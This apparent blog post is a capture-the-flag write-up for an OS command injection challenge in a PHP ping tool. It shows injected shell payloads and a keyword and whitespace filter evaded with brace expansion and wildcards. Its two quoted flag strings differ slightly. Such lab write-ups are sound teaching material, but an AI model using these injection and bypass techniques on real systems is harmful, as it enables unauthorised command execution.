ICMTC CTF 2023 — International Competition of the Military Technical College

1 min readJun 13, 2024


Ping Me — OS Command Injection

The PHP script utilizes bash to ping hosts.
At first glance, it appears to be vulnerable to OS Command Injection.

  1. Testing a Simple Command Injection
    Injected command:;ls
    Server response: index.php
    Result: Command injection successful, confirming the vulnerability.

2. Attempting to Read the File /flag
Injected command:;cat /flag
Server response: Flag is forbidden to read!
Result: Access to the flag is restricted.

3. Detection of Forbidden Words
After multiple tests, it was observed that any input containing the word ‘flag’ triggered the server to respond with: Flag is forbidden to read!
The characters &, $, \, and whitespace were detected as a hack.

4. Evading Detection
To bypass detection, the injection was modified as follows:;{cat,/f*l*a*g}
Note:;{cat,/f*l*a*g} and;{cat,/flag} are equivalent.

5. Executing the File
Executed command:;/f*l*a*g
Server response: Congratulations, this is the flag location: /tmp/flag_FXLNYL.txt
Result: Successfully located the flag file.

6. Reading the Flag
Injected command:;{cat,/tmp/f*l*a*g_FXLNYL.txt}
Server response: EGCERT{3x3cut3_703503_c0Mm@nD$W!th0ut$p@c3s}
Flag obtained: EGCERT{3x3cut3_703503_c0Mm@nD$_W!th0ut_$p@c3s}